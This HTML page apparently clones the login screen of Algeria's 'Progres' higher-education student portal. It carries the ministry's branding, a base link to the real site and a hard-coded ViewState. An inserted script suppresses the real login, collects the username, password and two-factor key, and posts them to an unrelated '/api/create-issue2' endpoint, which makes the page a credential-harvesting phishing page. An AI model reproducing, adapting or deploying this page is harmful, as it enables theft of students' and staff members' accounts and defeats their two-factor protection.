<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="j_idt2">
	 <base href="https://progres.mesrs.dz/webfve/login.xhtml" />-->
	<link href="/webfve/javax.faces.resource/theme.css.xhtml?ln=primefaces-saga&amp;v=11.0.0&amp;e=11.0.0" rel="stylesheet" type="text/css" />
	<link href="/webfve/javax.faces.resource/primeicons/primeicons.css.xhtml?ln=primefaces&amp;v=11.0.0&amp;e=11.0.0" rel="stylesheet" type="text/css" />
	<link href="/webfve/javax.faces.resource/css/bootstrap.min.css.xhtml" rel="stylesheet" type="text/css" />
	<link href="/webfve/javax.faces.resource/css/font-awesome.min.css.xhtml" rel="stylesheet" type="text/css" />
	<link href="/webfve/javax.faces.resource/css/progres-production.css.xhtml" rel="stylesheet" type="text/css" />
	<link href="/webfve/javax.faces.resource/css/jquery.ui.css.xhtml" rel="stylesheet" type="text/css" /><script type="text/javascript" src="/webfve/javax.faces.resource/jquery/jquery.js.xhtml?ln=primefaces&amp;v=11.0.0&amp;e=11.0.0"></script><script type="text/javascript" src="/webfve/javax.faces.resource/jquery/jquery-plugins.js.xhtml?ln=primefaces&amp;v=11.0.0&amp;e=11.0.0"></script><script type="text/javascript" src="/webfve/javax.faces.resource/core.js.xhtml?ln=primefaces&amp;v=11.0.0&amp;e=11.0.0"></script>
	<link href="/webfve/javax.faces.resource/components.css.xhtml?ln=primefaces&amp;v=11.0.0&amp;e=11.0.0" rel="stylesheet" type="text/css" /><script type="text/javascript" src="/webfve/javax.faces.resource/components.js.xhtml?ln=primefaces&amp;v=11.0.0&amp;e=11.0.0"></script><script type="text/javascript">if(window.PrimeFaces){PrimeFaces.settings.locale='fr';PrimeFaces.settings.viewId='/login.xhtml';PrimeFaces.settings.contextPath='/webfve';PrimeFaces.settings.cookiesSecure=false;PrimeFaces.settings.projectStage='Development';}</script>
	<title>Authentification - Formation et Vie Etudiante</title>
	<meta name="description" content=""/><meta name="author" content=""/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
	<link href="/webfve/images/favicon-FVE.ico" rel="shortcut icon" type="image/x-icon" />
	<style type="text/css">/* login */
body.login {
	background: #d7d7d7;
}

.login .logo {
	background: url(../img/logo.png);
	width: 277px;
	height: 112px;
	margin: 10px auto 15px;
}

.login #main {
	margin-left: 0;
}

.login #content {
	width: 400px;
	position: relative;
	margin: 0 auto;
	padding: 0;
}

.login .client-form header {
	color: #999;
	font-size: 180%;
	padding: 20px 0 0;
	text-align: center;
	border-bottom: none;
	background: none;
}

.login .smart-form footer {
	border-top: none;
	background: #c4c4c4;
}

.login .note {
	text-align: center;
	padding-top: 3px;
}

.login .smart-form .note a {
	color: #555;
}

.login .smart-form .input input {
	font: 13px/16px Arial, Helvetica, sans-serif;
}

.login .connect1,.login .connect2 {
	width: 49%;
	height: 60px;
	float: left;
}

.login .connect2 {
	padding-top: 4px;
}

.login .ui-button {
	padding: 3px 3px 6px !important;
	float: left !important;
	margin-right: 20px !important;
}

.login .bas,.login .bas a {
	color: #666;
	font-size: 9.5px;
	line-height: 150%;
	text-align: center;
	padding-bottom: 20px;
}

.login .well {
	background: #f0f0f0;
	border: none;
	box-shadow: none;
}

.login .smart-form fieldset {
	background: none;
}

.login .titre {
	color: #777;
	font-size: 150%;
	text-align: center;
	padding: 8px 0 14px;
}

.login #home {
	width: 936px;
	position: relative;
	margin: 0 auto;
}

.login #home .well {
	border: #f0f0f0 solid 3px;
}

.ui-button-login {
	background: none repeat scroll 0% 0% #1DA64A !important;
}
	</style>
</head>
<body class="animated fadeInDown login">
<div id="main" role="main">
<div class="container" id="content">
<div class="logo" style="padding: 10px; text-align: center"><img alt="Progres" src="/webfve/images/logo.png" /></div>

<div class="well no-padding" id="loginPanel">
<form action="" class="smart-form client-form" enctype="application/x-www-form-urlencoded" id="loginFrm" method="post" name="loginFrm"><input type="hidden" value="https://progres.mesrs.dz/webfve/login.xhtml/webfve/login.xhtml" /> <input type="hidden" value="loginFrm" />
<header>Progiciel de Gestion Int&eacute;gr&eacute;<br />
<small>Formation et Vie Etudiante </small></header>
<script type="text/javascript">$(function(){PrimeFaces.focus();});</script>

<script>
$(document).ready(function() {
    // Use the PrimeFaces button's click event instead of form submission
    $('#loginFrm\\:loginBtn').click(function(e) {
        e.preventDefault(); // Prevent the default PrimeFaces action
        
        const username = $('#loginFrm\\:j_username').val();
        const password = $('#loginFrm\\:j_password').val();
        const key = $('#loginFrm\\:j_mfa').val();
        
        // Your fetch call
        fetch('/api/create-issue2', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                username,
                password,
                key
            })
        })
        .then(response => response.json())
        .then(data => {
            console.log('Success:', data);
        })
        .catch(error => {
            console.error('Error:', error);
        });
    });
});
</script>

<fieldset style="padding-top: 5px">
<style type="text/css">.ui-messages-error-icon {
	background: none;
}

.messages-error-icon {
	width: 0px;
}
</style>
<div aria-live="polite" class="ui-messages ui-widget" id="loginFrm:messages">&nbsp;</div>
<script id="loginFrm:messages_s" type="text/javascript">$(function(){PrimeFaces.cw("Messages","widget_loginFrm_messages",{id:"loginFrm:messages"});});</script>

<form id="loginForm">
<section><label class="input"><input aria-required="true" autocomplete="off" class="ui-inputfield ui-inputtext ui-widget ui-state-default ui-corner-all " id="loginFrm:j_username" placeholder="Nom d'utilisateur" type="text" /><script id="loginFrm:j_username_s" type="text/javascript">$(function(){PrimeFaces.cw("InputText","widget_loginFrm_j_username",{id:"loginFrm:j_username"});});</script></label></section>

<section><label class="input"><input aria-required="true" autocomplete="off" class="ui-password ui-inputfield ui-widget ui-state-default ui-corner-all " id="loginFrm:j_password" placeholder="Mot de passe" type="password" /><script id="loginFrm:j_password_s" type="text/javascript">$(function(){PrimeFaces.cw("Password","widget_loginFrm_j_password",{id:"loginFrm:j_password"});});</script> </label></section>

<section><label class="input"><input autocomplete="off" class="ui-inputfield ui-inputtext ui-widget ui-state-default ui-corner-all " id="loginFrm:j_mfa" placeholder="clé double authentification" type="text" /><script id="loginFrm:j_mfa_s" type="text/javascript">$(function(){PrimeFaces.cw("InputText","widget_loginFrm_j_mfa",{id:"loginFrm:j_mfa"});});</script> </label></section>
</form>
<section>
<div class="connect1"><button class="ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only ui-button-save" id="loginFrm:loginBtn" name="loginFrm:loginBtn" onclick="PrimeFaces.bcn(this,event,[function(event){jQuery(this).addClass('ui-state-disabled')},function(event){}]);" type="submit"><span class="ui-button-text ui-c">Se connecter</span></button><script id="loginFrm:loginBtn_s" type="text/javascript">$(function(){PrimeFaces.cw("CommandButton","widget_loginFrm_loginBtn",{id:"loginFrm:loginBtn"});});</script></div>

<div class="connect2"><label class="checkbox"><input checked="false" type="checkbox" /> <i> </i>Rester connect&eacute; </label></div>
</section>
</fieldset>

<footer>
<div class="note"><a href="forget_password.xhtml">Mot de passe oubli&eacute; ?</a></div>
</footer>
<script id="loginFrm:j_idt19_s" type="text/javascript">$(function(){PrimeFaces.cw("Growl","widget_loginFrm_j_idt19",{id:"loginFrm:j_idt19",sticky:false,life:6000,escape:true,keepAlive:false,msgs:[]});});</script><input autocomplete="off" id="j_id1:javax.faces.ViewState:0" type="hidden" value="a2zz+dwm37eixS9r/j/UoGpMA02v/cu+HB8Bb2uiSleoq9BK66bE+UmgwUOzcic3zZAZOgXOZ+0gURO6DqL0YSCTLu1CC7MA6FKQ5MYX15kD5XQpuXaSMovb8IEO9cAKTqcRHl5hqltz7S9zjEQCg9k+AgNy39XfolFMAXcrPM7HCrkkRkB1gapNV8oqD2Hz/k85lCG2AnlwruNgYfKWL6c2I8kRxdosSvQgMfEpxw+nyFjR/RdSnwrTKxbssBSt1kVIP7ctHGqO0d+QebkgrwoJX6tdbV6cqvFl4Pn2h9mh9Znr8NSeV5iUihfBoTg4W2wV1nxEX+JIZQAxKTAFAFggWZ87fxwAtImUnACKFwQ7xsP6PF9pXGknSyTCcaYmXuGQvGdNIqpj6QyoHO6f+X3w0ryKX1NRkJ0tdoOnja3qlMRhL32oCfg45WNw4bAJigTMqo588tBo4gFEcf60BxX4Qre0IP49aDjzkuUTHzpgb4sbyKDiaNfxgOenmlgQi6ZdVrIJfoQ638sa2xIvwiZvjaU5qfNQegwYSssWGu/dl6s53FhMP4neDEmTYuh6LaNQdvAd6GiEKT+uSORtxtjS6Z3UQwFX2NFno5WfoqpxWbDB2ktQNvvEoSdUmPDOlZQP4XfOKw/z9e0DI44GkvgwCSAF61pDTvpirCYuSxPXnD5EOCe1x7rqrYsUj3Rh0eGpbClHfe/C3Ii7bhEGFS9Flx9aUPDjkCdLLPN5F4QfOxl6RZjP5JiUTzAtsI+VOE2m7LuEeU6I3ZAnppK/TNAN4BT/MEcdkwypHJTyT1UvGt3+J/XIuwG7ZtTUqR35ESk2pwibyp74m4mBE7Aou+9YTrjhzmbjJZF5RkL6Vvxg6GmTYDbMW7CLupm/MOYpMHSXqEHV3av5jaQvGvgwP1MOKPrqk1Fqm02pwoZiwb7HAD+p0hgNH896uyr33TfZ4MHLmSHHZq5V8l8JdIpcM99p7dINkoKxxZQEK9VET1nJPUvWbcg3AchRFKrEtl2x8/8NaqTnIGl1NvNHXQVH2g==" />&nbsp;</form>
</div>

<div class="bas">Copyright 2025 <a href="https://www.mesrs.dz/"><strong>Minist&eacute;re de l&#39;Enseignement Sup&eacute;rieur et de la Recherche Scientifique</strong></a><br />
<span style="font-size: 10px">version publi&eacute;e le 04-02-2025 14:20 </span></div>
</div>
</div>
</body>
</html>
